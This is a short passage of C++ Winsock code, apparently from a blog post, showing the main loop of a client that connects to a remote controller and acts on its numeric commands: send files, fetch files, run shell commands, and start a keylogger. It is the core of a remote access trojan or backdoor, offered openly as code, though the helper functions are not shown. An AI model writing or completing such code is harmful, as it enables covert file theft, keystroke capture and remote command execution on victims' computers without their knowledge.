	SOCKET socketClient = socket(AF_INET, SOCK_STREAM, 0);
	if (socketClient == INVALID_SOCKET)
	{
		cout << "socket error!  " << GetLastError() << endl;
		WSACleanup();
		closesocket(socketClient);
		return -1;
	}

	sockaddr_in addrServer;
	addrServer.sin_addr.S_un.S_addr = inet_addr(IP);
	addrServer.sin_family = AF_INET;
	addrServer.sin_port = htons(PORT);
	// The result of connect() is not examined; the loop below starts either way.
	connect(socketClient, (SOCKADDR*)&addrServer, sizeof(SOCKADDR));
	int op;
	while (1)
	{
		// The opcode is read as a raw int in host byte order; recvn's return value is not examined.
		recvn(socketClient, (char*)&op, sizeof(int)); 
		if (op == 1)
		{
			SendFile(socketClient);
		}
		if (op == 2)
		{
			GetFile(socketClient);
		}
		if (op == 3)
		{
			UseCmd(socketClient);
		}
		if (op == 4)
		{
			UseKeyLogger(socketClient);
		}
	}
	// Not reached: the loop above has no break.
	closesocket(socketClient);
	return 0;
}






版权声明:本文为zchahaha原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。